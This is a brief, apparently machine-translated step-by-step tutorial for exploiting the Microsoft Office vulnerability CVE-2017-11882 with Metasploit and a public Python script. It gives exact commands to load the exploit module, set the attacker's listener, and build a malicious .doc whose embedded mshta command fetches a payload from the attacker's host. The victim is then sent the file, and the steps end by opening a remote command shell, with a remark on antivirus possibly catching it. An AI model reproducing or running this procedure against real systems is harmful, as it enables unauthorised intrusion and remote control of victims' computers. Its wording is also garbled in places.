Target machine: A computer with a version of Office vulnerabilities installed
Attack aircraft: An Kai liunx ip:192.168.0.110
Python script download Link: https://github.com/Ridter/CVE-2017-11882
MSF Component downloads: Https://github.com/0x09AL/CVE-2017-11882-metasploit
A. Copy the cve_2017_11882.rb file downloaded above to the/usr/share/metasploit-framework/modules/exploits/windows/smb/directory
Two. Put the downloaded cve_2017_11882.rtf into the/usr/share/metasploit-framework/data/exploits/
If you don't put this file on, you may run a failure after performing exploit
Three. SAO operation started, open the artifact Metasploit
Four. Use command search cve_2017_11882 to find the corresponding module
Five. Use the command using exploit/windows/smb/cve_2017_11882 to set payload to bounce top
Six. Using the command set Lhost 192.168.0.110 (the IP of the attacker)
Seven. Use the command set Uripath test to set the path of the URI (note the path test set here, add this path when using the Python script to generate doc)
Eight. Check configuration, show options
Nine. Run, Exploit-j
10. Open a different terminal, copy command109b_cve-2017-11882.py to Kai Liunx desktop, CD to desktop, Run command python command109b_cve-2017-11882.py-c "Mshta Http://192.168.0.110:8080/test "-o Test4.doc generates a malicious doc file
Note To add port 8080 plus the URI path set above
11. copy files to target machine open
360 will probably kill the best off.
12. Return to the attack aircraft Kai Liunx, see the fish has been hooked
13. Use command sessions-i to view
14. Output command Sessions-i 1, switch into
15. Now we have successfully acquired the target machine, input shell, into our familiar CMD interface, and use the cmd command.
Thank you for your honor, there is no shortage of places please advise, welcome comments bombing, Thank you ...